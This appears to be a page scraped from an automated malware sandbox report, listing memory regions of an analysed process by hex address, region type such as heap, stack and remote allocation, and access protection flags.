trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4EC2000
trusted library allocation
page read and write
3200000
heap
page read and write
20F19000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
7230000
trusted library allocation
page read and write
7050000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
7F650000
trusted library allocation
page execute and read and write
7E4000
heap
page read and write
4A80000
trusted library allocation
page read and write
83E000
heap
page read and write
236F0000
heap
page execute and read and write
20B30000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
716E000
stack
page read and write
36A2000
remote allocation
page execute and read and write
2220E000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
7FCC000
stack
page read and write
4E60000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
401000
unkown
page execute read
407000
unkown
page readonly
20B30000
trusted library allocation
page read and write
46D1000
trusted library allocation
page read and write
170000
trusted library allocation
page read and write
626000
heap
page read and write
4AA0000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
8A50000
direct allocation
page execute and read and write
4E10000
trusted library allocation
page read and write
31F0000
heap
page read and write
7C90000
trusted library allocation
page read and write
6980000
direct allocation
page read and write
4A20000
heap
page read and write
4A80000
trusted library allocation
page read and write
401000
unkown
page execute read
401000
unkown
page execute read
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4B40000
heap
page read and write
7F8C000
stack
page read and write
20C50000
trusted library allocation
page read and write
2CA2000
remote allocation
page execute and read and write
4A80000
trusted library allocation
page read and write
8AF000
stack
page read and write
7D6000
heap
page read and write
20B30000
trusted library allocation
page read and write
6F49000
heap
page read and write
20B30000
trusted library allocation
page read and write
80000
trusted library allocation
page read and write
7E10000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
2227E000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
21158000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
930000
heap
page read and write
712E000
stack
page read and write
20F45000
trusted library allocation
page read and write
2209E000
trusted library allocation
page read and write
69A0000
direct allocation
page read and write
4AA0000
trusted library allocation
page read and write
23715000
heap
page read and write
5865000
trusted library allocation
page read and write
6990000
direct allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
465C000
stack
page read and write
2207F000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
409000
unkown
page write copy
210AF000
trusted library allocation
page read and write
7E20000
trusted library allocation
page read and write
20F09000
trusted library allocation
page read and write
2590000
heap
page read and write
71D0000
trusted library allocation
page read and write
4EF0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
810F000
heap
page read and write
210D9000
trusted library allocation
page read and write
4B39000
heap
page read and write
4D90000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
400000
unkown
page readonly
4A60000
trusted library allocation
page execute and read and write
23561000
heap
page read and write
22054000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
9C2000
trusted library allocation
page read and write
2110A000
trusted library allocation
page read and write
21F44000
trusted library allocation
page read and write
190000
trusted library allocation
page read and write
624000
heap
page read and write
20ED4000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
6EF7000
trusted library allocation
page read and write
9BA000
trusted library allocation
page execute and read and write
22128000
trusted library allocation
page read and write
2202C000
trusted library allocation
page read and write
29EE000
heap
page read and write
4A80000
trusted library allocation
page read and write
2093E000
stack
page read and write
6710000
heap
page read and write
7290000
trusted library allocation
page read and write
B0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
2103C000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
21F99000
trusted library allocation
page read and write
BA000
trusted library allocation
page execute and read and write
4A80000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
22F7E000
stack
page read and write
21EE1000
trusted library allocation
page read and write
4E96000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page execute and read and write
20C4F000
stack
page read and write
4A44000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4940000
heap
page read and write
21106000
trusted library allocation
page read and write
4A70000
heap
page read and write
71AD000
stack
page read and write
68F0000
direct allocation
page read and write
1FE50000
direct allocation
page read and write
4A30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
8107000
heap
page read and write
4A50000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20C50000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
6F20000
heap
page read and write
4AA0000
trusted library allocation
page read and write
7C80000
trusted library allocation
page execute and read and write
20B30000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
221C6000
trusted library allocation
page read and write
2104F000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
2378F000
heap
page read and write
20B31000
trusted library allocation
page read and write
4A90000
trusted library allocation
page read and write
71B0000
trusted library allocation
page read and write
93000
trusted library allocation
page execute and read and write
20900000
remote allocation
page read and write
221BA000
trusted library allocation
page read and write
There are 824 hidden memdumps, click here to show them.